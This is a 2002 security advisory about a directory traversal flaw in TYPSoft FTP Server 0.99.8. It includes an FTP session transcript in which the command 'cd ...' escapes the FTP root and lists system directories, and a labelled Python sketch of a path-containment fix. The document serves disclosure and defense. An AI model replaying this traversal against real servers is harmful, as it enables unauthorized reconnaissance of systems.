[NT] TYPSoft FTP Server Directory Traversal Vulnerability

From: support@securiteam.com
Date: 12/17/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Dec 2002 00:40:44 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      TYPSoft FTP Server Directory Traversal Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    Marc Bergeron's <http://www.typsoft.com/index.php?&lang=eng> TYPSoft
    multilingual Windows-based FTP server supports standard FTP commands,
    virtual file system architecture, transfer resumes, IP restrictions and
    logging. A vulnerability in the product allows remote attackers to cause
    the server to traverse into directories that reside outside the bounding
    FTP root directory.

    DETAILS

    Vulnerable systems:
     * TYPSoft FTP Server version 0.99.8

    Immune systems:
     * TYPSoft FTP Server version 0.99.13

    TYPSoft's failure to filter out "..." sequences in URL requests allows
    remote users to break out of restricted directories and gain read access
    to the system directory structure; arbitrary file retrieval is not
    possible, however.

    The following transcript demonstrates a sample exploitation of the
    vulnerability:

    C:\>ftp 10.20.30.40
    Connected to 10.20.30.40.
    220 TYPSoft FTP Server 0.99.8 ready...
    User (10.20.30.40:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd /
    250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd ..
    550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd ...
    250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current
    directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    AdminScripts
    ftproot
    iissamples
    mailroot
    Scripts
    webpub
    wwwroot
    226 Transfer complete.
    ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
    ftp> bye
    221 Goodbye!
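
Added example, not part of the advisory and not TYPSoft's code: a sketch of the segment filtering and root-containment check whose absence the advisory describes, replayed over the CWD arguments from the transcript above. The function names, the policy of rejecting any segment that ends in a dot or space, and the mapping to 250/550 replies are assumptions.

```python
import posixpath

# All names here are hypothetical; none are taken from TYPSoft FTP Server.
FTP_ROOT = "C:/Inetpub/ftproot"  # root shown in the advisory's transcript


class TraversalError(ValueError):
    """Raised when a CWD argument would leave the FTP root."""


def resolve_cwd(current, arg):
    """Resolve a CWD argument against the virtual directory `current`."""
    arg = arg.replace("\\", "/")
    parts = [] if arg.startswith("/") else [p for p in current.split("/") if p]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                raise TraversalError("'..' at the FTP root")
            parts.pop()
        elif seg != seg.rstrip(". ") or ":" in seg or "\x00" in seg:
            # Rejects "...", "....", trailing dots or spaces, drive letters, NUL.
            raise TraversalError("rejected path segment: %r" % seg)
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def to_real_path(virtual):
    """Map a virtual directory under FTP_ROOT (string-only, no OS lookups)."""
    real = posixpath.normpath(FTP_ROOT + "/" + virtual)
    if real != FTP_ROOT and not real.startswith(FTP_ROOT + "/"):
        raise TraversalError("resolved path escapes the FTP root")
    return real


def replay(cwd_args, start="/"):
    """Return (argument, reply code, resulting directory) for each CWD."""
    cwd, replies = start, []
    for arg in cwd_args:
        try:
            candidate = resolve_cwd(cwd, arg)
            to_real_path(candidate)
            cwd, code = candidate, 250
        except TraversalError:
            code = 550
        replies.append((arg, code, cwd))
    return replies
```

A production server would additionally canonicalise the resolved path with the operating system (links, case folding) before the containment comparison.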

    Analysis:
    Any remote user with legitimate or anonymous access to an affected TYPSoft
    FTP server can exploit the vulnerability and freely browse the target
    system's directory structure. Such information could prove useful in
    subsequent attacks, and could also help an attacker conduct social
    engineering attacks.

    Detection:
    TYPSoft FTP Server 0.99.8 is vulnerable to the above-described attack.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    TYPSoft FTP Server 0.99.13 fixes this issue. The latest version is
    available from <http://www.typsoft.com/download.php?prog=ftp&lang=eng>.

    Disclosure timeline:
    10/25/2002 Issue disclosed to iDEFENSE
    11/22/2002 Author notified (support@typsoft.com)
    11/22/2002 iDEFENSE clients notified
    11/23/2002 Responses received from support@typsoft.com
    12/16/2002 Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:listserv@idefense.com>
    iDEFENSE Labs; the vulnerability was discovered by
    <mailto:ts@securityoffice.net> Tamer Sahin.


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


